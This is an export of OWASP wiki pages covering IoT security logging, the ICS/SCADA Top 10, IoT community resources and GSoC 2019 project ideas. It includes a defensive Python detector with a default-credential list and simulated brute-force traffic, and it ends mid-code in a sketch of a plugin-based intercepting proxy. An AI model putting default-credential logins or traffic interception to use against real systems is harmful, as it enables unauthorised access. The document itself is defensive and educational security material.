|-<br />
|}<br />
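The detection side of the table above: in-process rules that raise several of the listed events over constructed sample requests. This is an added example for this page, not code from the OWASP IoT Event Logging Project; the record fields, the thresholds and the default-credential list are assumptions.<br />
<br />
```python
"""Detectors for several of the recommended minimum IoT logging events in the
table above, run over constructed sample request records.

Added example for this page; not code from the OWASP IoT Event Logging Project.
Records are dicts produced by an assumed device HTTP/auth layer; the field
names, thresholds and default-credential list below are assumptions.
"""
from collections import defaultdict
from typing import Dict, Iterable, List

SUPPORTED_METHODS = {"GET", "POST", "PUT", "DELETE"}
# Factory defaults the auth layer should reject outright; listed so their use
# can be logged (constructed values, not any real product's defaults).
DEFAULT_ADMIN_CREDS = {("admin", "admin"), ("admin", "1234")}
FAILED_PASSWORD_THRESHOLD = 3   # consecutive failures for one account
LOGIN_RATE_THRESHOLD = 5        # login attempts from one source within ...
LOGIN_RATE_WINDOW = 60.0        # ... this many seconds
MAX_PARAM_LEN = 64              # longest parameter value the API expects


def detect(records: Iterable[Dict]) -> List[Dict]:
    """Return one event dict per detected condition, in record order."""
    events: List[Dict] = []
    failures = defaultdict(int)       # user -> consecutive failed logins
    attempts = defaultdict(list)      # src_ip -> recent login timestamps
    known_geo = defaultdict(set)      # user -> countries of past successes
    session_src: Dict[str, str] = {}  # session_id -> source that created it

    def emit(category: str, event: str, rec: Dict) -> None:
        # Never copy the submitted password into the log record.
        events.append({"ts": rec["ts"], "category": category, "event": event,
                       "src_ip": rec["src_ip"], "user": rec.get("user")})

    for rec in records:
        # Request Exceptions
        if rec["method"] not in SUPPORTED_METHODS:
            emit("Request Exceptions", "Attempt to Invoke Unsupported HTTP Method", rec)
        for value in rec.get("params", {}).values():
            if len(value) > MAX_PARAM_LEN:
                emit("Request Exceptions", "Unexpected Quantity of Characters in Parameter", rec)
            elif not value.isprintable():
                emit("Request Exceptions", "Unexpected Type of Characters in Parameter", rec)

        # Session Exceptions: a session id presented from a different source
        sid = rec.get("session_id")
        if sid and session_src.setdefault(sid, rec["src_ip"]) != rec["src_ip"]:
            emit("Session Exceptions", "Source Location Changes During Session", rec)

        if rec["path"] != "/login":
            continue

        # Authentication Exceptions: attempt rate per source (sliding window)
        src = rec["src_ip"]
        attempts[src] = [t for t in attempts[src] if rec["ts"] - t < LOGIN_RATE_WINDOW]
        attempts[src].append(rec["ts"])
        if len(attempts[src]) == LOGIN_RATE_THRESHOLD:
            emit("Authentication Exceptions", "High Rate of Login Attempts", rec)

        user = rec["user"]
        if not rec["auth_ok"]:
            failures[user] += 1
            if failures[user] == FAILED_PASSWORD_THRESHOLD:
                emit("Authentication Exceptions", "Multiple Failed Passwords", rec)
            continue

        failures[user] = 0
        if (user, rec["password"]) in DEFAULT_ADMIN_CREDS:
            emit("Administrative Mode Events",
                 "Device Accessed Using Default Administrative Credentials", rec)
        if known_geo[user] and rec["geo"] not in known_geo[user]:
            emit("Authentication Exceptions", "Deviation from Normal GEO Location", rec)
        known_geo[user].add(rec["geo"])
    return events


def sample_records() -> List[Dict]:
    """Constructed traffic: a normal login, an odd request, a brute-force
    burst ending in a default-credential login, a geo change and a hijacked session."""
    login = {"method": "POST", "path": "/login", "params": {}, "geo": "DE"}
    recs = [
        {**login, "ts": 0.0, "src_ip": "10.0.0.5", "user": "alice", "password": "s3cret!", "auth_ok": True},
        {"ts": 1.0, "method": "TRACE", "path": "/", "src_ip": "10.0.0.9", "params": {}},
        {"ts": 2.0, "method": "GET", "path": "/api/status", "src_ip": "10.0.0.9", "params": {"id": "A" * 200}},
    ]
    for i in range(5):  # five failed admin logins from one source within a minute
        recs.append({**login, "ts": 10.0 + i, "src_ip": "10.0.0.9", "user": "admin",
                     "password": f"guess{i}", "auth_ok": False})
    recs += [
        {**login, "ts": 20.0, "src_ip": "10.0.0.9", "user": "admin", "password": "admin", "auth_ok": True},
        {**login, "ts": 30.0, "src_ip": "203.0.113.7", "user": "alice", "password": "s3cret!",
         "auth_ok": True, "geo": "BR"},
        {"ts": 40.0, "method": "GET", "path": "/api/config", "src_ip": "10.0.0.5", "params": {}, "session_id": "S1"},
        {"ts": 41.0, "method": "GET", "path": "/api/config", "src_ip": "203.0.113.7", "params": {}, "session_id": "S1"},
    ]
    return recs
```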
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to feed a solid detection and response program around IoT devices, and companies that want to build such a program have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>
Aaron.guzman
https://wiki.owasp.org/index.php?title=GSoC2019_Ideas&diff=248539
GSoC2019 Ideas
2019-03-08T00:44:34Z
<p>Aaron.guzman: /* IoT Goat */</p>
<hr />
<div>=OWASP Project Requests=<br />
<br />
'''Tips to get you started in no particular order:'''<br />
* Read the [https://developers.google.com/open-source/gsoc/ Google Summer of Code Program (GSOC)] page<br />
* Read the [[GSoC SAT]]<br />
* Read the [https://www.owasp.org/index.php/GSoC GSOC Student Guidelines]<br />
* Contact us through the mailing list or irc channel.<br />
* Check our [https://github.com/OWASP github organization]<br />
<br />
<br />
==OWASP-SKF==<br />
<br />
=== '''Idea 1 Improving the Machine Learning chatbot:''' ===<br />
We want to extend the functionality of the SKF Bot (Security Knowledge Framework Chatbot).<br />
<br />
Suggested improvements to its functionality are:<br />
<br />
# Create a desktop version of the chatbot, so people can install a setup file on their local machine.<br />
# Create a plugin or website bot which can be embedded in the website for a better chat experience for the user.<br />
# Extend the bot's capability to do a Google search (using web scraping) for things which are not available in the database, so it has a wider scope of knowledge.<br />
# Add a basic conversation flow which makes the SKF Bot friendly and provides a better user experience, for example replies to general queries like "How are you?" or "What is your name?".<br />
# Extend the bot's capability to reply with which security controls should be followed from the ASVS and MASVS or other custom checklists that are present in SKF.<br />
# Extend the bot to different platforms like Facebook, Telegram, Slack, Google Assistant etc.<br />
<br />
The existing chatbot implementation is on Gitter. You can test the bot by typing @skfchatbot in the Gitter community.<br />
<br />
'''Getting started:'''<br />
<br />
* Get familiar with the architecture and code base of SKF (Security Knowledge Framework)<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
<br />
* Python 3+, Flask, CoffeeScript<br />
<br />
'''Mentors and Leaders'''<br />
<br />
Glenn ten Cate (Mentor, Project leader)<br />
<br />
Riccardo ten Cate (Mentor, Project leader)<br />
<br />
Priyanka Jain (Mentor)<br />
<br />
=== '''Idea 2 Improving and building Lab challenges and write-ups:''' ===<br />
Build lab examples and write-ups (how to test) for different vulnerabilities over different technology stacks. These challenges are to be delivered in Docker so they can be easily deployed.<br />
<br />
In the current situation the Security Knowledge Framework ultimately presents a list of security controls with correlating knowledge base items that contain a description and a solution. The new labs are used to give software developers or application security specialists a more in-depth understanding of, and approach to, testing for the vulnerabilities in their own code.<br />
* For example, we now have around 20 lab challenges in Docker containers built in Python:<br />
** A Local File Inclusion Docker app example:<br />
*** https://github.com/blabla1337/skf-labs/tree/master/LFI<br />
** A write-up example:<br />
*** https://owasp-skf.gitbook.io/asvs-write-ups/filename-injection<br />
The images that are pushed to the GitHub repository are automatically built and pushed to a Docker registry, from which SKF users can easily pull the images to get their labs running. Of course they can also download and build them from source by pulling the original repository.<br />
<br />
'''Mentors and Leaders''' <br />
<br />
Glenn ten Cate (Mentor, Project leader)<br />
<br />
Riccardo ten Cate (Mentor, Project leader)<br />
<br />
== OWASP DefectDojo ==<br />
OWASP DefectDojo is a popular open source vulnerability management tool, used as the backbone for security programs. It is easy to get started with and work on! We welcome volunteers of all experience levels and are happy to provide mentorship.<br />
<br />
Option 1: Unit Tests - Difficulty: Easy<br />
* If you're new to programming, unit tests are short scripts designed to test a specific function of an application.<br />
* The project needs additional unit tests to ensure that new code functions properly. <br />
Option 2: Feature Enhancement - Difficulty: Varies<br />
* The functionality of DefectDojo is constantly expanding.<br />
* Feature enhancements offer programming challenges for all levels of experience.<br />
Option 3: Pull Request Review - Difficulty: Moderate - Hard<br />
* Test pull requests and provide feedback on code.<br />
<br />
== OHP (OWASP Honeypot) ==<br />
<br />
[[OWASP_Python_Honeypot|OWASP Honeypot]] is open source software written in Python, designed for creating honeypots and honeynets in an easy and secure way. The project is compatible with Python 2.x and 3.x and has been tested on Windows, Mac OS X and Linux.<br />
<br />
=== Getting Started ===<br />
<br />
It's best to start from the [https://github.com/zdresearch/OWASP-Honeypot/wiki GitHub wiki page]; we are looking forward to adding more modules and optimizing the core.<br />
<br />
=== Technologies ===<br />
<br />
Currently we are using<br />
<br />
* Docker<br />
* Python<br />
* MongoDB<br />
* TShark<br />
* Flask<br />
* ChartJS<br />
* And more Linux services<br />
<br />
=== Expected Results ===<br />
<br />
* Zero bugs: currently we may have several bugs under different conditions, and it's best to test all functions and fix them<br />
* Monitoring: right now monitoring is limited to the connections (send & receive); it's best to store and analyze the contents for further investigation and for recognizing incoming attacks.<br />
* Duplicated code: the engine code is complicated and duplicated, and should be fixed/cleaned up<br />
* New modules: add creative ICS/network/web modules and vulnerable web applications, services and so on<br />
* API: update the API so it is in sync with all features<br />
* WebUI: demonstrate and add the API on the WebUI and the live version with all features<br />
* WebUI special reports: track the attacks more creatively and report high-risk IPs<br />
* Database: better database structure, faster, and using a queue<br />
* Data analysis: analyze stored data and attack signatures<br />
* OWASP Top 10: prepare useful processed/raw data for the OWASP Top 10 project<br />
<br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Packet Analysis & Tshark & Libpcap<br />
* Docker<br />
* Database<br />
* Web Development Skills<br />
* Honeypot and Deception knowledge<br />
<br />
=== Mentors and Leaders ===<br />
<br />
* [mailto:ali.razmjoo@owasp.org Ali Razmjoo] (Mentor & Project Leader)<br />
* [mailto:ehsan@nezami.me Ehsan Nezami] (Mentor & Project Leader)<br />
* [mailto:reza.espargham@owasp.org Reza Espargham] (Mentor)<br />
* [mailto:abiusx@owasp.org Abbas Naderi] (Mentor)<br />
<br />
== OWASP Juice Shop ==<br />
<br />
[[OWASP Juice Shop Project]] is an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws. Juice Shop is written in Node.js, Express and Angular. The application contains more than 30 challenges of varying difficulty where the user is supposed to exploit the underlying vulnerabilities. Apart from the hacker and awareness training use case, pentesting proxies or security scanners can use Juice Shop as a "guinea pig"-application to check how well their tools cope with Javascript-heavy application frontends and REST APIs.<br />
The best way to get in touch with us is the '''community chat on https://gitter.im/bkimminich/juice-shop<nowiki/>.''' You can also send PMs to the potential mentors (@bkimminich, @J12934 and @CaptainFreak) there if you like!<br />
<br />
To receive early feedback please '''put your proposal on Google Docs and submit it to the OWASP Organization on Google's GSoC page''' in ''Draft Shared'' mode. Please pick '''''juice shop'' as Proposal Tag''' to make them easier to find for us. '''Thank you!'''<br />
<br />
=== Feature Pack 2019 ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
Ideas for potential new functionality and "business" features are collected in [https://github.com/bkimminich/juice-shop/issues?q=is%3Aissue+is%3Aopen+label%3Afeature GitHub issues labeled "feature"]. This project could implement a whole bunch of new features one by one and release them over the course of several small releases. This would allow the student to work in a professional Continuous Delivery kind of way while bringing benefit to the Juice Shop over the duration of the project.<br />
<br />
''Coming up with good additional ideas for features and new functionality in the proposal could make the difference between being selected or declined as a student for this project!''<br />
<br />
'''Expected Results:'''<br />
* 5 or more new features or functional enhancements of significant scope for OWASP Juice Shop (not necessarily including corresponding challenges)<br />
* Each feature comes with full functional unit and integration tests<br />
* Extending the functional walk-through chapter of the "Pwning OWASP Juice Shop" ebook<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, security knowledge is optional.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Juice Shop Mobile ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
A complete mobile client for Juice-Shop API which will serve a legit mobile experience for Juice-Shop user as well as a plethora of Mobile app vulnerabilities and challenges around them to solve. Should in the best case translate the idea of Juice Shop's hacking challenges with a score board and success notifications into the mobile world.<br />
<br />
''Coming up with a sophisticated proposal (optimally even with a good initial sample implementation) could make the difference between being selected or declined as a student for this project!''<br />
<br />
''' Getting started '''<br />
* Get familiar with the architecture and code base of the application's RESTful backend<br />
* Get familiar with native app development<br />
* Get familiar with Mobile vulnerabilities<br />
<br />
'''Expected Results:'''<br />
* A mobile App with consistent UI/UX for Juice-Shop with standard client side vulnerabilities.<br />
* Sufficient initial release quality (on par with Juice Shop and Juice Shop CTF) to make it an official extension project hosted in its own GitHub repository ''bkimminich/juice-shop-mobile''<br />
* Code follows existing styleguides and applies similar quality gates regarding code smells, test coverage etc. as the main project.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) React Native and NodeJS/Express, some Mobile security knowledge would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Challenge Pack 2019 ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
Ideas for potential new hacking challenges are collected in [https://github.com/bkimminich/juice-shop/issues?q=is%3Aissue+is%3Aopen+label%3Achallenge GitHub issues labeled "challenge"]. This project could implement a whole bunch of challenges one by one and release them over the course of several small releases. This would allow the student to work in a professional Continuous Delivery kind of way while bringing benefit to the Juice Shop over the duration of the project.<br />
<br />
''Coming up with good additional ideas for challenges in the proposal could make the difference between being selected or declined as a student for this project!''<br />
<br />
'''Expected Results:'''<br />
* 10 or more new challenges for OWASP Juice Shop (including required functional enhancements to place the challenges)<br />
* Each challenge comes with full functional unit and integration tests<br />
* Each challenge is verified to be exploitable by corresponding end-to-end tests<br />
* Hint and solution sections for each new challenge are added to the "Pwning OWASP Juice Shop" ebook<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, some security knowledge would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Hacking Instructor ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
While the Juice Shop is offering a lot of long-lasting motivation and challenges for security experts, it might be a bit daunting for newcomers and less experienced hackers.<br />
The "Hacking Instructor" as sketched in [https://github.com/bkimminich/juice-shop/issues/440 GitHub issue #440] could guide users from this target audience through at least some of the hacking challenges. As this would be an entirely new and relatively independent feature of the Juice Shop, students should be able to bring in their own creativity and ideas a lot.<br />
<br />
''For this project, a good proposal with a design & implementation proposal more sophisticated than the rough ideas in [https://github.com/bkimminich/juice-shop/issues/440 #440] is paramount to be selected as a student!''<br />
<br />
'''Expected Results:'''<br />
* A working implementation of e.g. an avatar-style "Hacking Instructor" or another solution based on the student's own proposal<br />
* Coverage of at least the trivial (1-star) and some easy (2-star) challenges<br />
* Documentation on how to configure or script the "Hacking Instructor" for challenges in general<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular, some UI/UX experience would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Your idea ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
You have an awesome idea to improve OWASP Juice Shop that is not on this list? Great, please submit it!<br />
<br />
''' Getting started '''<br />
* Get in touch with [https://www.owasp.org/index.php/User:Bjoern_Kimminich Bjoern Kimminich]<br />
<br />
'''Expected Results:'''<br />
* A new feature that makes OWASP Juice Shop even better<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, some security knowledge would be preferable.<br />
<br />
'''Mentors:''' <br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
<br />
==OWASP-Securetea Tools Project ==<br />
The purpose of this application is to warn the user (via various communication mechanisms) whenever their laptop is accessed. This small application was developed and tested in Python on a Linux machine and is likely to work well on the Raspberry Pi as well. Source:<br />
https://github.com/OWASP/SecureTea-Project/blob/master/README.md<br />
<br />
===Brief Explanation===<br />
Have an awesome idea to improve the SecureTea Project that is not on this list? We would like to hear it. The aim is to make this project useful to everyone who wants to secure their small IoT devices.<br />
<br />
===Idea===<br />
Below are the roadmap and the expected results; choose any of them to improve the SecureTea Project.<br />
If you find any bugs, please help to fix them.<br />
<br />
===Roadmap=== <br />
See Our Roadmap<br><br />
https://github.com/OWASP/SecureTea-Project#roadmap<br><br />
Notify by Twitter (done)<br><br />
Securetea Dashboard / Gui (done)<br><br />
<br />
===Expected Results ===<br />
<br><br />
Securetea Protection /firewall<br><br />
Securetea Antivirus<br><br />
Notify by Whatsapp<br><br />
Notify by SMS Alerts<br><br />
Notify by Line<br><br />
Notify by Telegram<br><br />
Intelligent Log Monitoring<br><br />
Login History<br><br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Javascript <br />
* Angular and NodeJS/Express<br />
* Database<br />
* Linux<br />
<br />
=== Mentors === <br />
<br />
* [mailto:ade.putra@owasp.org Ade Yoseman Putra] - (OWASP Securetea Project Leader) <br><br />
* [mailto:rejah.rehim@owasp.org Rejah Rehim.A.A] - (OWASP Securetea Project Leader)<br />
<br><br />
<br />
==OWASP OWTF==<br />
'''[https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF)]''' is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST. Most of the ideas below focus on rewriting some major components of OWTF to make it more modular. OWTF is moving to a fresh codebase with a fully Dockerized testing and deployment environment. If you want to get a jumpstart, check out https://github.com/owtf/owtf/tree/new-arch.<br />
===OWASP OWTF - MiTM proxy interception and replay capabilities===<br />
'''Brief Explanation:'''<br />
<br />
The OWTF man-in-the-middle proxy is written completely in Python (based on the excellent Tornado framework) and was benchmarked to be the fastest MiTM Python proxy. However, it lacks the useful and much needed interception and replay capabilities of mitmproxy (https://github.com/mitmproxy/mitmproxy).<br />
<br />
The current implementation of the MiTM proxy serves its purpose very well. It is fast, but it is not extensible. There are a number of good use cases for being extensible:<br />
*ability to intercept the transactions<br />
*modify or replay transaction on the fly<br />
*add additional capabilities to the proxy (such as session marking/changing) without polluting the main proxy code<br />
Bonus:<br />
*Design and implement a proxy plugin (middleware) architecture so that the plugins can be defined separately and the user can choose what plugins to include dynamically (from the web interface).<br />
*Replace the current Requester (based on urllib, urllib2) with a more robust Requester based on the newer urllib3, with support for a real headless browser factory. The typical flow when an authenticated browser instance is requested (using PhantomJS):<br />
<br />
*The "Requester" module checks if there is any login parameters provided (i.e form-based or script - look at https://github.com/owtf/login-sessions-plugin)<br />
*Create a browser instance and do the necessary login procedure<br />
*Handle the browser for the URI<br />
*When called to close the browser, do a clean logout and kill the browser instance.<br />
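The interception, modification and replay hooks described above can be modelled as a plugin (middleware) chain that sits in front of the proxy's upstream request path. The following Python is an added example and not OWTF code: it contains no Tornado or network I/O, the upstream server is a constructed stand-in, and the names Transaction, ProxyPlugin, Proxy and the three sample plugins are assumptions made for this illustration.<br />

```python
"""Plugin (middleware) pipeline for an intercepting proxy.

Added example, not OWTF code: it models the intercept / modify / replay
flow a middleware layer would give the proxy, without Tornado or any
network I/O. Transaction, ProxyPlugin, Proxy and the plugin names are
assumptions made for this illustration.
"""
import copy
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional


@dataclass
class Transaction:
    method: str
    url: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""
    response_status: Optional[int] = None
    response_body: str = ""
    tags: Dict[str, str] = field(default_factory=dict)  # metadata plugins attach


class ProxyPlugin:
    """Base class; a plugin overrides only the hooks it needs."""

    def on_request(self, tx: Transaction) -> Optional[Transaction]:
        return tx  # return None to drop the request

    def on_response(self, tx: Transaction) -> Transaction:
        return tx


class SessionMarker(ProxyPlugin):
    """Tag each transaction with the session cookie it carries."""

    def __init__(self, cookie_name: str = "session"):
        self.cookie_name = cookie_name

    def on_request(self, tx):
        for part in tx.headers.get("Cookie", "").split(";"):
            name, _, value = part.strip().partition("=")
            if name == self.cookie_name:
                tx.tags["session"] = value
        return tx


class HeaderRewriter(ProxyPlugin):
    """Interception hook: rewrite a request header before it leaves."""

    def __init__(self, header: str, value: str):
        self.header, self.value = header, value

    def on_request(self, tx):
        tx.headers[self.header] = self.value
        return tx


class BlockHost(ProxyPlugin):
    """Drop requests for an out-of-scope host instead of forwarding them."""

    def __init__(self, host: str):
        self.host = host

    def on_request(self, tx):
        return None if self.host in tx.url else tx


class Proxy:
    def __init__(self, upstream: Callable[[Transaction], Transaction],
                 plugins: List[ProxyPlugin]):
        self.upstream = upstream      # sends the request to the real server
        self.plugins = plugins        # chosen dynamically, e.g. from the web UI
        self.history: List[Transaction] = []

    def handle(self, tx: Transaction) -> Optional[Transaction]:
        for plugin in self.plugins:            # request phase, in order
            tx = plugin.on_request(tx)
            if tx is None:
                return None
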